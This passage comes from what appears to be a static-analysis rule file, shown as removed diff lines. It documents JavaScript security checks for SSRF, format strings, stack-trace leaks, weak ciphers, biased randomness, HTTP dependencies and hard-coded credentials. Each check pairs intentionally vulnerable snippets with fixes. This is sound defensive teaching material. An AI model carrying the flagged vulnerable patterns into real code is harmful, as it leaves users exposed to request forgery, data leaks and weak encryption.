regex](https://stackoverflow.com/questions/1732348/regex-match-open-tags-except-xhtml-self-contained-tags#answer-1732454).\n* HTML Standard: [Comment end bang state](https://html.spec.whatwg.org/multipage/parsing.html#comment-end-bang-state).\n* stackoverflow.com: [Why aren't browsers strict about HTML?](https://stackoverflow.com/questions/25559999/why-arent-browsers-strict-about-html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-80](https://cwe.mitre.org/data/definitions/80.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n* Common Weakness Enumeration: [CWE-184](https://cwe.mitre.org/data/definitions/184.html).\n* Common 
Weakness Enumeration: [CWE-185](https://cwe.mitre.org/data/definitions/185.html).\n* Common Weakness Enumeration: [CWE-186](https://cwe.mitre.org/data/definitions/186.html).\n" - }, - "properties" : { - "tags" : [ "correctness", "security", "external/cwe/cwe-020", "external/cwe/cwe-080", "external/cwe/cwe-116", "external/cwe/cwe-184", "external/cwe/cwe-185", "external/cwe/cwe-186" ], - "description" : "Matching HTML tags using regular expressions is hard to do right, and can easily lead to security issues.", - "id" : "js/bad-tag-filter", - "kind" : "problem", - "name" : "Bad HTML filtering regexp", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "7.8" - } - }, { - "id" : "js/tainted-format-string", - "name" : "js/tainted-format-string", - "shortDescription" : { - "text" : "Use of externally-controlled format string" - }, - "fullDescription" : { - "text" : "Using external input in format strings can lead to garbled output." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Use of externally-controlled format string\nFunctions like the Node.js standard library function `util.format` accept a format string that is used to format the remaining arguments by providing inline format specifiers. If the format string contains unsanitized input from an untrusted source, then that string may contain unexpected format specifiers that cause garbled output.\n\n\n## Recommendation\nEither sanitize the input before including it in the format string, or use a `%s` specifier in the format string, and pass the untrusted data as corresponding argument.\n\n\n## Example\nThe following program snippet logs information about an unauthorized access attempt. 
The log message includes the user name, and the user's IP address is passed as an additional argument to `console.log` to be appended to the message:\n\n\n```javascript\nconst app = require(\"express\")();\n\napp.get(\"unauthorized\", function handler(req, res) {\n let user = req.query.user;\n let ip = req.connection.remoteAddress;\n console.log(\"Unauthorized access attempt by \" + user, ip);\n});\n\n```\nHowever, if a malicious user provides `%d` as their user name, `console.log` will instead attempt to format the `ip` argument as a number. Since IP addresses are not valid numbers, the result of this conversion is `NaN`. The resulting log message will read \"Unauthorized access attempt by NaN\", missing all the information that it was trying to log in the first place.\n\nInstead, the user name should be included using the `%s` specifier:\n\n\n```javascript\nconst app = require(\"express\")();\n\napp.get(\"unauthorized\", function handler(req, res) {\n let user = req.query.user;\n let ip = req.connection.remoteAddress;\n console.log(\"Unauthorized access attempt by %s\", user, ip);\n});\n\n```\n\n## References\n* Node.js Documentation: [util.format](https://nodejs.org/api/util.html#util_util_format_format_args).\n* Common Weakness Enumeration: [CWE-134](https://cwe.mitre.org/data/definitions/134.html).\n", - "markdown" : "# Use of externally-controlled format string\nFunctions like the Node.js standard library function `util.format` accept a format string that is used to format the remaining arguments by providing inline format specifiers. 
If the format string contains unsanitized input from an untrusted source, then that string may contain unexpected format specifiers that cause garbled output.\n\n\n## Recommendation\nEither sanitize the input before including it in the format string, or use a `%s` specifier in the format string, and pass the untrusted data as corresponding argument.\n\n\n## Example\nThe following program snippet logs information about an unauthorized access attempt. The log message includes the user name, and the user's IP address is passed as an additional argument to `console.log` to be appended to the message:\n\n\n```javascript\nconst app = require(\"express\")();\n\napp.get(\"unauthorized\", function handler(req, res) {\n let user = req.query.user;\n let ip = req.connection.remoteAddress;\n console.log(\"Unauthorized access attempt by \" + user, ip);\n});\n\n```\nHowever, if a malicious user provides `%d` as their user name, `console.log` will instead attempt to format the `ip` argument as a number. Since IP addresses are not valid numbers, the result of this conversion is `NaN`. 
The resulting log message will read \"Unauthorized access attempt by NaN\", missing all the information that it was trying to log in the first place.\n\nInstead, the user name should be included using the `%s` specifier:\n\n\n```javascript\nconst app = require(\"express\")();\n\napp.get(\"unauthorized\", function handler(req, res) {\n let user = req.query.user;\n let ip = req.connection.remoteAddress;\n console.log(\"Unauthorized access attempt by %s\", user, ip);\n});\n\n```\n\n## References\n* Node.js Documentation: [util.format](https://nodejs.org/api/util.html#util_util_format_format_args).\n* Common Weakness Enumeration: [CWE-134](https://cwe.mitre.org/data/definitions/134.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-134" ], - "description" : "Using external input in format strings can lead to garbled output.", - "id" : "js/tainted-format-string", - "kind" : "path-problem", - "name" : "Use of externally-controlled format string", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "7.3" - } - }, { - "id" : "js/request-forgery", - "name" : "js/request-forgery", - "shortDescription" : { - "text" : "Server-side request forgery" - }, - "fullDescription" : { - "text" : "Making a network request with user-controlled data in the URL allows for request forgery attacks." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Server-side request forgery\nDirectly incorporating user input in the URL of an outgoing HTTP request can enable a request forgery attack, in which the request is altered to target an unintended API endpoint or resource. If the server performing the request is connected to an internal network, this can give an attacker the means to bypass the network boundary and make requests against internal services. 
A forged request may perform an unintended action on behalf of the attacker, or cause information leak if redirected to an external server or if the request response is fed back to the user. It may also compromise the server making the request, if the request response is handled in an unsafe way.\n\n\n## Recommendation\nRestrict user inputs in the URL of an outgoing request, in particular:\n\n* Avoid user input in the hostname of the URL. Pick the hostname from an allow-list instead of constructing it directly from user input.\n* Take care when user input is part of the pathname of the URL. Restrict the input so that path traversal (\"`../`\") cannot be used to redirect the request to an unintended endpoint.\n\n## Example\nThe following example shows an HTTP request parameter being used directly in the URL of a request without validating the input, which facilitates an SSRF attack. The request `http.get(...)` is vulnerable since attackers can choose the value of `target` to be anything they want. 
For instance, the attacker can choose `\"internal.example.com/#\"` as the target, causing the URL used in the request to be `\"https://internal.example.com/#.example.com/data\"`.\n\nA request to `https://internal.example.com` may be problematic if that server is not meant to be directly accessible from the attacker's machine.\n\n\n```javascript\nimport http from 'http';\n\nconst server = http.createServer(function(req, res) {\n const target = new URL(req.url, \"http://example.com\").searchParams.get(\"target\");\n\n // BAD: `target` is controlled by the attacker\n http.get('https://' + target + \".example.com/data/\", res => {\n // process request response ...\n });\n\n});\n\n```\nOne way to remedy the problem is to use the user input to select a known fixed string before performing the request:\n\n\n```javascript\nimport http from 'http';\n\nconst server = http.createServer(function(req, res) {\n const target = new URL(req.url, \"http://example.com\").searchParams.get(\"target\");\n\n let subdomain;\n if (target === 'EU') {\n subdomain = \"europe\"\n } else {\n subdomain = \"world\"\n }\n\n // GOOD: `subdomain` is controlled by the server\n http.get('https://' + subdomain + \".example.com/data/\", res => {\n // process request response ...\n });\n\n});\n\n```\n\n## References\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* Common Weakness Enumeration: [CWE-918](https://cwe.mitre.org/data/definitions/918.html).\n", - "markdown" : "# Server-side request forgery\nDirectly incorporating user input in the URL of an outgoing HTTP request can enable a request forgery attack, in which the request is altered to target an unintended API endpoint or resource. If the server performing the request is connected to an internal network, this can give an attacker the means to bypass the network boundary and make requests against internal services. 
A forged request may perform an unintended action on behalf of the attacker, or cause information leak if redirected to an external server or if the request response is fed back to the user. It may also compromise the server making the request, if the request response is handled in an unsafe way.\n\n\n## Recommendation\nRestrict user inputs in the URL of an outgoing request, in particular:\n\n* Avoid user input in the hostname of the URL. Pick the hostname from an allow-list instead of constructing it directly from user input.\n* Take care when user input is part of the pathname of the URL. Restrict the input so that path traversal (\"`../`\") cannot be used to redirect the request to an unintended endpoint.\n\n## Example\nThe following example shows an HTTP request parameter being used directly in the URL of a request without validating the input, which facilitates an SSRF attack. The request `http.get(...)` is vulnerable since attackers can choose the value of `target` to be anything they want. 
For instance, the attacker can choose `\"internal.example.com/#\"` as the target, causing the URL used in the request to be `\"https://internal.example.com/#.example.com/data\"`.\n\nA request to `https://internal.example.com` may be problematic if that server is not meant to be directly accessible from the attacker's machine.\n\n\n```javascript\nimport http from 'http';\n\nconst server = http.createServer(function(req, res) {\n const target = new URL(req.url, \"http://example.com\").searchParams.get(\"target\");\n\n // BAD: `target` is controlled by the attacker\n http.get('https://' + target + \".example.com/data/\", res => {\n // process request response ...\n });\n\n});\n\n```\nOne way to remedy the problem is to use the user input to select a known fixed string before performing the request:\n\n\n```javascript\nimport http from 'http';\n\nconst server = http.createServer(function(req, res) {\n const target = new URL(req.url, \"http://example.com\").searchParams.get(\"target\");\n\n let subdomain;\n if (target === 'EU') {\n subdomain = \"europe\"\n } else {\n subdomain = \"world\"\n }\n\n // GOOD: `subdomain` is controlled by the server\n http.get('https://' + subdomain + \".example.com/data/\", res => {\n // process request response ...\n });\n\n});\n\n```\n\n## References\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* Common Weakness Enumeration: [CWE-918](https://cwe.mitre.org/data/definitions/918.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-918" ], - "description" : "Making a network request with user-controlled data in the URL allows for request forgery attacks.", - "id" : "js/request-forgery", - "kind" : "path-problem", - "name" : "Server-side request forgery", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "9.1" - } - }, { - "id" : "js/stack-trace-exposure", - "name" : "js/stack-trace-exposure", - "shortDescription" : { - "text" : "Information exposure 
through a stack trace" - }, - "fullDescription" : { - "text" : "Propagating stack trace information to an external user can unintentionally reveal implementation details that are useful to an attacker for developing a subsequent exploit." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Information exposure through a stack trace\nSoftware developers often add stack traces to error messages, as a debugging aid. Whenever that error message occurs for an end user, the developer can use the stack trace to help identify how to fix the problem. In particular, stack traces can tell the developer more about the sequence of events that led to a failure, as opposed to merely the final state of the software when the error occurred.\n\nUnfortunately, the same information can be useful to an attacker. The sequence of function names in a stack trace can reveal the structure of the application as well as any internal components it relies on. Furthermore, the error message at the top of a stack trace can include information such as server-side file names and SQL code that the application relies on, allowing an attacker to fine-tune a subsequent injection attack.\n\n\n## Recommendation\nSend the user a more generic error message that reveals less information. Either suppress the stack trace entirely, or log it only on the server.\n\n\n## Example\nIn the following example, an exception is caught and its stack trace is sent back to the remote user as part of the HTTP response. 
As such, the user is able to see a detailed stack trace, which may contain sensitive information.\n\n\n```javascript\nvar http = require('http');\n\nhttp.createServer(function onRequest(req, res) {\n var body;\n try {\n body = handleRequest(req);\n }\n catch (err) {\n res.statusCode = 500;\n res.setHeader(\"Content-Type\", \"text/plain\");\n res.end(err.stack); // NOT OK\n return;\n }\n res.statusCode = 200;\n res.setHeader(\"Content-Type\", \"application/json\");\n res.setHeader(\"Content-Length\", body.length);\n res.end(body);\n}).listen(3000);\n\n```\nInstead, the stack trace should be logged only on the server. That way, the developers can still access and use the error log, but remote users will not see the information:\n\n\n```javascript\nvar http = require('http');\n\nhttp.createServer(function onRequest(req, res) {\n var body;\n try {\n body = handleRequest(req);\n }\n catch (err) {\n res.statusCode = 500;\n res.setHeader(\"Content-Type\", \"text/plain\");\n log(\"Exception occurred\", err.stack);\n res.end(\"An exception occurred\"); // OK\n return;\n }\n res.statusCode = 200;\n res.setHeader(\"Content-Type\", \"application/json\");\n res.setHeader(\"Content-Length\", body.length);\n res.end(body);\n}).listen(3000);\n\n```\n\n## References\n* OWASP: [Improper Error Handling](https://owasp.org/www-community/Improper_Error_Handling).\n* Common Weakness Enumeration: [CWE-209](https://cwe.mitre.org/data/definitions/209.html).\n* Common Weakness Enumeration: [CWE-497](https://cwe.mitre.org/data/definitions/497.html).\n", - "markdown" : "# Information exposure through a stack trace\nSoftware developers often add stack traces to error messages, as a debugging aid. Whenever that error message occurs for an end user, the developer can use the stack trace to help identify how to fix the problem. 
In particular, stack traces can tell the developer more about the sequence of events that led to a failure, as opposed to merely the final state of the software when the error occurred.\n\nUnfortunately, the same information can be useful to an attacker. The sequence of function names in a stack trace can reveal the structure of the application as well as any internal components it relies on. Furthermore, the error message at the top of a stack trace can include information such as server-side file names and SQL code that the application relies on, allowing an attacker to fine-tune a subsequent injection attack.\n\n\n## Recommendation\nSend the user a more generic error message that reveals less information. Either suppress the stack trace entirely, or log it only on the server.\n\n\n## Example\nIn the following example, an exception is caught and its stack trace is sent back to the remote user as part of the HTTP response. As such, the user is able to see a detailed stack trace, which may contain sensitive information.\n\n\n```javascript\nvar http = require('http');\n\nhttp.createServer(function onRequest(req, res) {\n var body;\n try {\n body = handleRequest(req);\n }\n catch (err) {\n res.statusCode = 500;\n res.setHeader(\"Content-Type\", \"text/plain\");\n res.end(err.stack); // NOT OK\n return;\n }\n res.statusCode = 200;\n res.setHeader(\"Content-Type\", \"application/json\");\n res.setHeader(\"Content-Length\", body.length);\n res.end(body);\n}).listen(3000);\n\n```\nInstead, the stack trace should be logged only on the server. 
That way, the developers can still access and use the error log, but remote users will not see the information:\n\n\n```javascript\nvar http = require('http');\n\nhttp.createServer(function onRequest(req, res) {\n var body;\n try {\n body = handleRequest(req);\n }\n catch (err) {\n res.statusCode = 500;\n res.setHeader(\"Content-Type\", \"text/plain\");\n log(\"Exception occurred\", err.stack);\n res.end(\"An exception occurred\"); // OK\n return;\n }\n res.statusCode = 200;\n res.setHeader(\"Content-Type\", \"application/json\");\n res.setHeader(\"Content-Length\", body.length);\n res.end(body);\n}).listen(3000);\n\n```\n\n## References\n* OWASP: [Improper Error Handling](https://owasp.org/www-community/Improper_Error_Handling).\n* Common Weakness Enumeration: [CWE-209](https://cwe.mitre.org/data/definitions/209.html).\n* Common Weakness Enumeration: [CWE-497](https://cwe.mitre.org/data/definitions/497.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-209", "external/cwe/cwe-497" ], - "description" : "Propagating stack trace information to an external user can\n unintentionally reveal implementation details that are useful\n to an attacker for developing a subsequent exploit.", - "id" : "js/stack-trace-exposure", - "kind" : "path-problem", - "name" : "Information exposure through a stack trace", - "precision" : "very-high", - "problem.severity" : "warning", - "security-severity" : "5.4" - } - }, { - "id" : "js/weak-cryptographic-algorithm", - "name" : "js/weak-cryptographic-algorithm", - "shortDescription" : { - "text" : "Use of a broken or weak cryptographic algorithm" - }, - "fullDescription" : { - "text" : "Using broken or weak cryptographic algorithms can compromise security." 
- }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Use of a broken or weak cryptographic algorithm\nUsing broken or weak cryptographic algorithms can leave data vulnerable to being decrypted or forged by an attacker.\n\nMany cryptographic algorithms provided by cryptography libraries are known to be weak, or flawed. Using such an algorithm means that encrypted or hashed data is less secure than it appears to be.\n\n\n## Recommendation\nEnsure that you use a strong, modern cryptographic algorithm. Use at least AES-128 or RSA-2048 for encryption, and SHA-2 or SHA-3 for secure hashing.\n\n\n## Example\nThe following code shows an example of using the builtin cryptographic library of NodeJS to encrypt some secret data. When creating a `Cipher` instance to encrypt the secret data with, you must specify the encryption algorithm to use. The first example uses DES, which is an older algorithm that is now considered weak. The second example uses AES, which is a strong modern algorithm.\n\n\n```javascript\nconst crypto = require('crypto');\n\nvar secretText = obj.getSecretText();\n\nconst desCipher = crypto.createCipher('des', key);\nlet desEncrypted = desCipher.write(secretText, 'utf8', 'hex'); // BAD: weak encryption\n\nconst aesCipher = crypto.createCipher('aes-128', key);\nlet aesEncrypted = aesCipher.update(secretText, 'utf8', 'hex'); // GOOD: strong encryption\n\n```\n\n## References\n* NIST, FIPS 140 Annex a: [ Approved Security Functions](http://csrc.nist.gov/publications/fips/fips140-2/fips1402annexa.pdf).\n* NIST, SP 800-131A: [ Transitions: Recommendation for Transitioning the Use of Cryptographic Algorithms and Key Lengths](http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-131Ar1.pdf).\n* OWASP: [Rule - Use strong approved cryptographic algorithms](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#rule---use-strong-approved-authenticated-encryption).\n* 
Common Weakness Enumeration: [CWE-327](https://cwe.mitre.org/data/definitions/327.html).\n* Common Weakness Enumeration: [CWE-328](https://cwe.mitre.org/data/definitions/328.html).\n", - "markdown" : "# Use of a broken or weak cryptographic algorithm\nUsing broken or weak cryptographic algorithms can leave data vulnerable to being decrypted or forged by an attacker.\n\nMany cryptographic algorithms provided by cryptography libraries are known to be weak, or flawed. Using such an algorithm means that encrypted or hashed data is less secure than it appears to be.\n\n\n## Recommendation\nEnsure that you use a strong, modern cryptographic algorithm. Use at least AES-128 or RSA-2048 for encryption, and SHA-2 or SHA-3 for secure hashing.\n\n\n## Example\nThe following code shows an example of using the builtin cryptographic library of NodeJS to encrypt some secret data. When creating a `Cipher` instance to encrypt the secret data with, you must specify the encryption algorithm to use. The first example uses DES, which is an older algorithm that is now considered weak. 
The second example uses AES, which is a strong modern algorithm.\n\n\n```javascript\nconst crypto = require('crypto');\n\nvar secretText = obj.getSecretText();\n\nconst desCipher = crypto.createCipher('des', key);\nlet desEncrypted = desCipher.write(secretText, 'utf8', 'hex'); // BAD: weak encryption\n\nconst aesCipher = crypto.createCipher('aes-128', key);\nlet aesEncrypted = aesCipher.update(secretText, 'utf8', 'hex'); // GOOD: strong encryption\n\n```\n\n## References\n* NIST, FIPS 140 Annex a: [ Approved Security Functions](http://csrc.nist.gov/publications/fips/fips140-2/fips1402annexa.pdf).\n* NIST, SP 800-131A: [ Transitions: Recommendation for Transitioning the Use of Cryptographic Algorithms and Key Lengths](http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-131Ar1.pdf).\n* OWASP: [Rule - Use strong approved cryptographic algorithms](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#rule---use-strong-approved-authenticated-encryption).\n* Common Weakness Enumeration: [CWE-327](https://cwe.mitre.org/data/definitions/327.html).\n* Common Weakness Enumeration: [CWE-328](https://cwe.mitre.org/data/definitions/328.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-327", "external/cwe/cwe-328" ], - "description" : "Using broken or weak cryptographic algorithms can compromise security.", - "id" : "js/weak-cryptographic-algorithm", - "kind" : "path-problem", - "name" : "Use of a broken or weak cryptographic algorithm", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "7.5" - } - }, { - "id" : "js/biased-cryptographic-random", - "name" : "js/biased-cryptographic-random", - "shortDescription" : { - "text" : "Creating biased random numbers from a cryptographically secure source." - }, - "fullDescription" : { - "text" : "Some mathematical operations on random numbers can cause bias in the results and compromise security." 
- }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Creating biased random numbers from a cryptographically secure source.\nGenerating secure random numbers can be an important part of creating a secure software system. This can be done using APIs that create cryptographically secure random numbers.\n\nHowever, using some mathematical operations on these cryptographically secure random numbers can create biased results, where some outcomes are more likely than others. Such biased results can make it easier for an attacker to guess the random numbers, and thereby break the security of the software system.\n\n\n## Recommendation\nBe very careful not to introduce bias when performing mathematical operations on cryptographically secure random numbers.\n\nIf possible, avoid performing mathematical operations on cryptographically secure random numbers at all, and use a preexisting library instead.\n\n\n## Example\nThe example below uses the modulo operator to create an array of 10 random digits using random bytes as the source for randomness.\n\n\n```javascript\nconst crypto = require('crypto');\n\nconst digits = [];\nfor (let i = 0; i < 10; i++) {\n digits.push(crypto.randomBytes(1)[0] % 10); // NOT OK\n}\n```\nThe random byte is a uniformly random value between 0 and 255, and thus the result from using the modulo operator is slightly more likely to be between 0 and 5 than between 6 and 9.\n\nThe issue has been fixed in the code below by using a library that correctly generates cryptographically secure random values.\n\n\n```javascript\nconst cryptoRandomString = require('crypto-random-string');\n\nconst digits = cryptoRandomString({length: 10, type: 'numeric'});\n```\nAlternatively, the issue can be fixed by fixing the math in the original code. In the code below the random byte is discarded if the value is greater than or equal to 250. 
Thus the modulo operator is used on a uniformly random number between 0 and 249, which results in a uniformly random digit between 0 and 9.\n\n\n```javascript\nconst crypto = require('crypto');\n\nconst digits = [];\nwhile (digits.length < 10) {\n const byte = crypto.randomBytes(1)[0];\n if (byte >= 250) {\n continue;\n }\n digits.push(byte % 10); // OK\n}\n```\n\n## References\n* Stack Overflow: [Understanding “randomness”](https://stackoverflow.com/questions/3956478/understanding-randomness).\n* OWASP: [Insecure Randomness](https://owasp.org/www-community/vulnerabilities/Insecure_Randomness).\n* OWASP: [Rule - Use strong approved cryptographic algorithms](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#rule---use-strong-approved-authenticated-encryption).\n* Common Weakness Enumeration: [CWE-327](https://cwe.mitre.org/data/definitions/327.html).\n", - "markdown" : "# Creating biased random numbers from a cryptographically secure source.\nGenerating secure random numbers can be an important part of creating a secure software system. This can be done using APIs that create cryptographically secure random numbers.\n\nHowever, using some mathematical operations on these cryptographically secure random numbers can create biased results, where some outcomes are more likely than others. 
Such biased results can make it easier for an attacker to guess the random numbers, and thereby break the security of the software system.\n\n\n## Recommendation\nBe very careful not to introduce bias when performing mathematical operations on cryptographically secure random numbers.\n\nIf possible, avoid performing mathematical operations on cryptographically secure random numbers at all, and use a preexisting library instead.\n\n\n## Example\nThe example below uses the modulo operator to create an array of 10 random digits using random bytes as the source for randomness.\n\n\n```javascript\nconst crypto = require('crypto');\n\nconst digits = [];\nfor (let i = 0; i < 10; i++) {\n digits.push(crypto.randomBytes(1)[0] % 10); // NOT OK\n}\n```\nThe random byte is a uniformly random value between 0 and 255, and thus the result from using the modulo operator is slightly more likely to be between 0 and 5 than between 6 and 9.\n\nThe issue has been fixed in the code below by using a library that correctly generates cryptographically secure random values.\n\n\n```javascript\nconst cryptoRandomString = require('crypto-random-string');\n\nconst digits = cryptoRandomString({length: 10, type: 'numeric'});\n```\nAlternatively, the issue can be fixed by fixing the math in the original code. In the code below the random byte is discarded if the value is greater than or equal to 250. 
Thus the modulo operator is used on a uniformly random number between 0 and 249, which results in a uniformly random digit between 0 and 9.\n\n\n```javascript\nconst crypto = require('crypto');\n\nconst digits = [];\nwhile (digits.length < 10) {\n const byte = crypto.randomBytes(1)[0];\n if (byte >= 250) {\n continue;\n }\n digits.push(byte % 10); // OK\n}\n```\n\n## References\n* Stack Overflow: [Understanding “randomness”](https://stackoverflow.com/questions/3956478/understanding-randomness).\n* OWASP: [Insecure Randomness](https://owasp.org/www-community/vulnerabilities/Insecure_Randomness).\n* OWASP: [Rule - Use strong approved cryptographic algorithms](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#rule---use-strong-approved-authenticated-encryption).\n* Common Weakness Enumeration: [CWE-327](https://cwe.mitre.org/data/definitions/327.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-327" ], - "description" : "Some mathematical operations on random numbers can cause bias in\n the results and compromise security.", - "id" : "js/biased-cryptographic-random", - "kind" : "problem", - "name" : "Creating biased random numbers from a cryptographically secure source.", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "7.5" - } - }, { - "id" : "js/insecure-dependency", - "name" : "js/insecure-dependency", - "shortDescription" : { - "text" : "Dependency download using unencrypted communication channel" - }, - "fullDescription" : { - "text" : "Using unencrypted protocols to fetch dependencies can leave an application open to man-in-the-middle attacks." 
- }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Dependency download using unencrypted communication channel\nUsing an insecure protocol like HTTP or FTP to download build dependencies makes the build process vulnerable to a man-in-the-middle (MITM) attack.\n\nThis can allow attackers to inject malicious code into the downloaded dependencies, and thereby infect the build artifacts and execute arbitrary code on the machine building the artifacts.\n\n\n## Recommendation\nAlways use a secure protocol, such as HTTPS or SFTP, when downloading artifacts from an URL.\n\n\n## Example\nThe below example shows a `package.json` file that downloads a dependency using the insecure HTTP protocol.\n\n\n```json\n{\n \"name\": \"example-project\",\n \"dependencies\": {\n \"unencrypted\": \"http://example.org/foo/tarball/release/0.0.1\",\n \"lodash\": \"^4.0.0\"\n }\n}\n```\nThe fix is to change the protocol to HTTPS.\n\n\n```json\n{\n \"name\": \"example-project\",\n \"dependencies\": {\n \"unencrypted\": \"https://example.org/foo/tarball/release/0.0.1\",\n \"lodash\": \"^4.0.0\"\n }\n}\n```\n\n## References\n* Jonathan Leitschuh: [ Want to take over the Java ecosystem? All you need is a MITM! ](https://infosecwriteups.com/want-to-take-over-the-java-ecosystem-all-you-need-is-a-mitm-1fc329d898fb)\n* Max Veytsman: [ How to take over the computer of any Java (or Closure or Scala) Developer. 
](https://max.computer/blog/how-to-take-over-the-computer-of-any-java-or-clojure-or-scala-developer/)\n* Wikipedia: [Supply chain attack.](https://en.wikipedia.org/wiki/Supply_chain_attack)\n* Wikipedia: [Man-in-the-middle attack.](https://en.wikipedia.org/wiki/Man-in-the-middle_attack)\n* Common Weakness Enumeration: [CWE-300](https://cwe.mitre.org/data/definitions/300.html).\n* Common Weakness Enumeration: [CWE-319](https://cwe.mitre.org/data/definitions/319.html).\n* Common Weakness Enumeration: [CWE-494](https://cwe.mitre.org/data/definitions/494.html).\n* Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n", - "markdown" : "# Dependency download using unencrypted communication channel\nUsing an insecure protocol like HTTP or FTP to download build dependencies makes the build process vulnerable to a man-in-the-middle (MITM) attack.\n\nThis can allow attackers to inject malicious code into the downloaded dependencies, and thereby infect the build artifacts and execute arbitrary code on the machine building the artifacts.\n\n\n## Recommendation\nAlways use a secure protocol, such as HTTPS or SFTP, when downloading artifacts from an URL.\n\n\n## Example\nThe below example shows a `package.json` file that downloads a dependency using the insecure HTTP protocol.\n\n\n```json\n{\n \"name\": \"example-project\",\n \"dependencies\": {\n \"unencrypted\": \"http://example.org/foo/tarball/release/0.0.1\",\n \"lodash\": \"^4.0.0\"\n }\n}\n```\nThe fix is to change the protocol to HTTPS.\n\n\n```json\n{\n \"name\": \"example-project\",\n \"dependencies\": {\n \"unencrypted\": \"https://example.org/foo/tarball/release/0.0.1\",\n \"lodash\": \"^4.0.0\"\n }\n}\n```\n\n## References\n* Jonathan Leitschuh: [ Want to take over the Java ecosystem? All you need is a MITM! 
](https://infosecwriteups.com/want-to-take-over-the-java-ecosystem-all-you-need-is-a-mitm-1fc329d898fb)\n* Max Veytsman: [ How to take over the computer of any Java (or Closure or Scala) Developer. ](https://max.computer/blog/how-to-take-over-the-computer-of-any-java-or-clojure-or-scala-developer/)\n* Wikipedia: [Supply chain attack.](https://en.wikipedia.org/wiki/Supply_chain_attack)\n* Wikipedia: [Man-in-the-middle attack.](https://en.wikipedia.org/wiki/Man-in-the-middle_attack)\n* Common Weakness Enumeration: [CWE-300](https://cwe.mitre.org/data/definitions/300.html).\n* Common Weakness Enumeration: [CWE-319](https://cwe.mitre.org/data/definitions/319.html).\n* Common Weakness Enumeration: [CWE-494](https://cwe.mitre.org/data/definitions/494.html).\n* Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-300", "external/cwe/cwe-319", "external/cwe/cwe-494", "external/cwe/cwe-829" ], - "description" : "Using unencrypted protocols to fetch dependencies can leave an application\n open to man-in-the-middle attacks.", - "id" : "js/insecure-dependency", - "kind" : "problem", - "name" : "Dependency download using unencrypted communication channel", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "8.1" - } - }, { - "id" : "js/hardcoded-credentials", - "name" : "js/hardcoded-credentials", - "shortDescription" : { - "text" : "Hard-coded credentials" - }, - "fullDescription" : { - "text" : "Hard-coding credentials in source code may enable an attacker to gain unauthorized access." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Hard-coded credentials\nIncluding unencrypted hard-coded authentication credentials in source code is dangerous because the credentials may be easily discovered. 
For example, the code may be open source, or it may be leaked or accidentally revealed, making the credentials visible to an attacker. This, in turn, might enable them to gain unauthorized access, or to obtain privileged information.\n\n\n## Recommendation\nRemove hard-coded credentials, such as user names, passwords and certificates, from source code. Instead, place them in configuration files, environment variables or other data stores if necessary. If possible, store configuration files including credential data separately from the source code, in a secure location with restricted access.\n\n\n## Example\nThe following code example connects to an HTTP request using an hard-codes authentication header:\n\n\n```javascript\nlet base64 = require('base-64');\n\nlet url = 'http://example.org/auth';\nlet username = 'user';\nlet password = 'passwd';\n\nlet headers = new Headers();\n\nheaders.append('Content-Type', 'text/json');\nheaders.append('Authorization', 'Basic' + base64.encode(username + \":\" + password));\n\nfetch(url, {\n method:'GET',\n headers: headers\n })\n.then(response => response.json())\n.then(json => console.log(json))\n.done();\n\n```\nInstead, user name and password can be supplied through the environment variables `username` and `password`, which can be set externally without hard-coding credentials in the source code.\n\n\n```javascript\nlet base64 = require('base-64');\n\nlet url = 'http://example.org/auth';\nlet username = process.env.USERNAME;\nlet password = process.env.PASSWORD;\n\nlet headers = new Headers();\n\nheaders.append('Content-Type', 'text/json');\nheaders.append('Authorization', 'Basic' + base64.encode(username + \":\" + password));\n\nfetch(url, {\n method:'GET',\n headers: headers\n })\n.then(response => response.json())\n.then(json => console.log(json))\n.done();\n\n```\n\n## Example\nThe following code example connects to a Postgres database using the `pg` package and hard-codes user name and password:\n\n\n```javascript\nconst 
